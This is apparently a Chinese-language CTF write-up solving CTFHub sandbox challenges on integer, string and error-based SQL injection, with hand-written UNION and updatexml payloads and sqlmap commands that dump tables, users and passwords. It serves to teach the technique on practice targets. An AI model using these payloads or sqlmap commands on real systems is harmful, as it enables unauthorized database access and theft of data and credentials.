目录
整数型注入
手工注入
先输入1
data:image/s3,"s3://crabby-images/bae8d/bae8d53fa2aea06f30490656718f6a097d9a55a1" alt=""
接着尝试2,3,2有回显,而3没有回显
data:image/s3,"s3://crabby-images/1eec4/1eec41f9c12439ecc71bb5e9bb916344debb954d" alt=""
data:image/s3,"s3://crabby-images/e0a4e/e0a4ea261e951c8506a83d80f77e44861edf8675" alt=""
同样的,输入非整数的字符也没有回显
data:image/s3,"s3://crabby-images/03a77/03a775df86e5fa88aa6d3a9d274061640c50133e" alt=""
根据结果可以判断这是整数型注入,接着就可以爆字段了
1 order by 1,接着尝试爆1 order by 2, 1 order by 3,结果到1 order by 3出现报错,由此可以判断,表格中有两个字段
data:image/s3,"s3://crabby-images/7cfe9/7cfe937bf22c00ddaff2fc7010f50b276382544b" alt=""
爆数据库
data:image/s3,"s3://crabby-images/84d59/84d59031c95c12d1f1a73bad1e8eab9a7792ba7d" alt=""
-1 union select 1,database()
data:image/s3,"s3://crabby-images/caa47/caa471c9b7d6ce1bff57bf363a082514d9be6880" alt=""
为什么要将1设置为-1呢?
因为我们是要让服务器返回的是select 1,database()的数据 因为服务器没有-1 所以会返回select 1 的内容
爆破表名
limit 0,1(0,1从数据库地一个开始只拿一个字段)
-1 union select 1,(select table_name from information_schema.tables where table_schema='sqli' limit 0,1)
data:image/s3,"s3://crabby-images/521ef/521efdc5dcaaf0caee2b9ef592d471fb611d0c9d" alt=""
得到该数据库的所有字段
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
data:image/s3,"s3://crabby-images/401ae/401ae712ec08aa8e210d57b1bba2fb7815537bc3" alt=""
爆破字段名
-1 union select 1,group_concat(flag) from sqli.flag
data:image/s3,"s3://crabby-images/2eb41/2eb416761328990555ee630df2d988bfc6f75586" alt=""
sqlmap注入
sqlmap注入步骤:
查询sqlmap是否存在注入命令:sqlmap.py -u url/?id=1
查询当前用户下的所有数据库:sqlmap.py -u url/?id=1 --dbs
获取数据库的表名:sqlmap.py -u url/?id=1 -D (数据库名) --tables
获取表中的字段名:sqlmap.py -u url/?id=1 -D (数据库名) -T (输入需要查询的表名) --columns
获取字段的内容:sqlmap.py -u url/?id=1 -D (数据库名) -T (输入需要查询的表名) -C (表内的字段名) --dump
查询数据库的所有用户:sqlmap.py -u url/?id=1 --users
查询数据库的所有密码:sqlmap.py -u url/?id=1 --passwords
查询数据库名称:sqlmap.py -u url/?id=1 --current-db
在Kali Linux上运行sqlmap不需要后面的.py直接sqlmap就行了
查询sqlmap是否存在注入命令
sqlmap -u http://challenge-5454400515b8754e.sandbox.ctfhub.com:10800/?id=1
data:image/s3,"s3://crabby-images/bd0f9/bd0f993067a74533b7a51a2e7bd4a4f9484e1b87" alt=""
发现id might be vulnerable 说明 存在注入,执行完成发现爆出了很多信息
查询当前用户下的所有数据库
sqlmap -u http://challenge-5454400515b8754e.sandbox.ctfhub.com:10800/?id=1 --dbs
data:image/s3,"s3://crabby-images/11fea/11feab6625f7e81b03635ee2fa1f801d85884808" alt=""
获取数据库的表名
sqlmap -u http://challenge-5454400515b8754e.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables
获取表中的字段名
sqlmap -u http://challenge-5454400515b8754e.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns
data:image/s3,"s3://crabby-images/2b7c8/2b7c8f259d261e22f49a773a188dc5b28dc689e4" alt=""
获取字段的内容
sqlmap -u http://challenge-5454400515b8754e.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump
data:image/s3,"s3://crabby-images/3bacf/3bacf5bed2bcbe890ddc274070257389cbccd538" alt=""
字符型注入
手工注入
先输入一个1
data:image/s3,"s3://crabby-images/4820d/4820de7ae90cedc26341da48f8c88824c6798d98" alt=""
当输入1 and 1=1 得到的结果却有'
data:image/s3,"s3://crabby-images/e3009/e300928742e6dc0d2c4cec7b631bf6f5d63b6893" alt=""
那就输入1' ,发现报错没有回显,接着输入1' and 1=1
data:image/s3,"s3://crabby-images/ff869/ff869134262334a4b5deabbd8b69f323d07690c5" alt=""
发现后面有一个分号,总体一看是多着一个分号,那就用#将其注释掉
data:image/s3,"s3://crabby-images/691c6/691c63f46099f5b57dc10d5c310bb7ce61c70c29" alt=""
data:image/s3,"s3://crabby-images/b2b26/b2b26154bc460f422564da0550e3a8ecefefb9a1" alt=""
成功找到注入点,但是sql语句后面要加#注释掉后面会报错的内容
爆数据库
-1' union select 1,database() #(这里的-1和整数型注入的情况一样)
data:image/s3,"s3://crabby-images/2b5a5/2b5a571ea21028db015b99bdf0401fb4cec52fdf" alt=""
爆表名
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' #
data:image/s3,"s3://crabby-images/42781/42781dcec933aec25c905348eead8c7f05de15f1" alt=""
查询flag
-1' union select 1,group_concat(flag) from sqli.flag #
data:image/s3,"s3://crabby-images/7b6b0/7b6b0b73f87adb952ce5c21f2ee50db68a09c8b2" alt=""
sqlmap注入
查询sqlmap是否存在注入命令
sqlmap -u http://challenge-4c9cc826165e1d03.sandbox.ctfhub.com:10800/?id=1
data:image/s3,"s3://crabby-images/65893/65893d319fe6879a3b0eb58387c764757f3c5e56" alt=""
查询数据库
sqlmap -u http://challenge-4c9cc826165e1d03.sandbox.ctfhub.com:10800/?id=1 --dbs
data:image/s3,"s3://crabby-images/76208/762081b7df1bf15d7ef1e249d92550d5a8ba4e96" alt=""
获取数据库的表名
sqlmap -u http://challenge-4c9cc826165e1d03.sandbox.ctfhub.com:10800/?id=1 --tables
data:image/s3,"s3://crabby-images/68387/683871c91d5cd6752a3b6a085595fea0efaba871" alt=""
获取表中的字段名
sqlmap -u http://challenge-4c9cc826165e1d03.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns
data:image/s3,"s3://crabby-images/271a2/271a28d0c1786fa1350e0f040a8e4ded38fe0cb2" alt=""
获取字段的内容
sqlmap -u http://challenge-4c9cc826165e1d03.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump
data:image/s3,"s3://crabby-images/5aa11/5aa111bae5033788cc60f9220d2a2d487dc88342" alt=""
报错注入
手工注入
先输入一个1
data:image/s3,"s3://crabby-images/685b1/685b13000838b6daf213d49e05682448d052ef3f" alt=""
尝试输入1',出现报错
data:image/s3,"s3://crabby-images/80093/80093ae3af36776da370533b1bd0f20b0c5125b2" alt=""
使用的函数是updatemxl(1,2,3)
MySQL提供了一个 updatexml() 函数,当第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。
特殊符号我们选择 ~ 0x7e
爆数据库名
1 and updatexml(1,concat(0x7e,database()),3)
data:image/s3,"s3://crabby-images/d7dfe/d7dfed26c23638203a9ee40281efd71ed402f957" alt=""
爆破表名
1 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='sqli')),3)
data:image/s3,"s3://crabby-images/1dec0/1dec0faf425033f224d7359ba9a65331af316c3b" alt=""
获取字段名
1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='sqli'and table_name='flag')),3)
data:image/s3,"s3://crabby-images/51dff/51dff61f7a4fdd70671ea55c7b45fe6ff56d02a1" alt=""
获取字段内容
1 and updatexml(1,concat(0x7e,(select group_concat(flag)from sqli.flag)),3)
data:image/s3,"s3://crabby-images/9811e/9811e1571e73807c5fb10d62ce661e0b641841e5" alt=""
但是没有将flag的所有字符输出出来,所以现在运用函数将flag完整的输出出来
1 and updatexml(1,concat(0x7e,mid((select group_concat(flag)from sqli.flag),1,16)),3)
data:image/s3,"s3://crabby-images/ef3a1/ef3a10b526caaa18e8174eac83915b3595f4e05d" alt=""
1 and extractvalue(null,concat(0x7e,mid((select flag from flag),4),0x7e))
data:image/s3,"s3://crabby-images/c1f32/c1f329efcbe784ea993d715a61d300f29b7a24ad" alt=""
sqlmap注入
查询sqlmap是否存在注入命令
sqlmap -u http://challenge-1cc8f2ef630934ce.sandbox.ctfhub.com:10800/?id=1
data:image/s3,"s3://crabby-images/9cc26/9cc26e2cb3f672dc4c057a01b2282fcaadba3e43" alt=""
爆数据库名
sqlmap -u http://challenge-1cc8f2ef630934ce.sandbox.ctfhub.com:10800/?id=1 --dbs
data:image/s3,"s3://crabby-images/281b4/281b46272bca24169f34f832d032fcd898f088dd" alt=""
获取数据库的表名
sqlmap -u http://challenge-1cc8f2ef630934ce.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables
data:image/s3,"s3://crabby-images/fb701/fb70154a5aee560c57a844c870485086e065c6f3" alt=""
获取表中的字段名
sqlmap -u http://challenge-1cc8f2ef630934ce.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns
data:image/s3,"s3://crabby-images/a7148/a714824cb202715fffc71585f8d2677a53b74ee6" alt=""
获取字段的内容
data:image/s3,"s3://crabby-images/e32c9/e32c9889d24f2f6f026f417c6c539b580ab5baab" alt=""